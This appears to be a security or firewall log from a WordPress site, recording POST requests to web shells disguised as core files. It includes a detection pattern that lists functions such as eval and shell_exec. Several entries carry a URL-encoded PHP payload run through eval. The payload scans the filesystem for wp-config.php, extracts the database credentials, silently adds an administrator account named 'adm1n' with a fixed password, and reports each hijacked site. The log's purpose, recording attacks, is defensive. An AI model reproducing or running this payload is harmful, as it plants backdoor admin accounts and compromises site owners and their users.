20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/pomo\/mo.php HTTP\/1.1\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncontent-length:12663\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-site:none\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-mode:navigate\nsec-ch-ua-mobile:?0\nsec-fetch-dest:document\nsec-ch-ua-platform:\"Windows\"\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36\nhost:dewenlabels.com\nsec-fetch-user:?1\n\nHaFMzo=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 18:03:22","213.209.159.254","POST","\/wp-includes\/sodium_compat\/src\/Core\/Base64\/security.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> bRjtVo:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20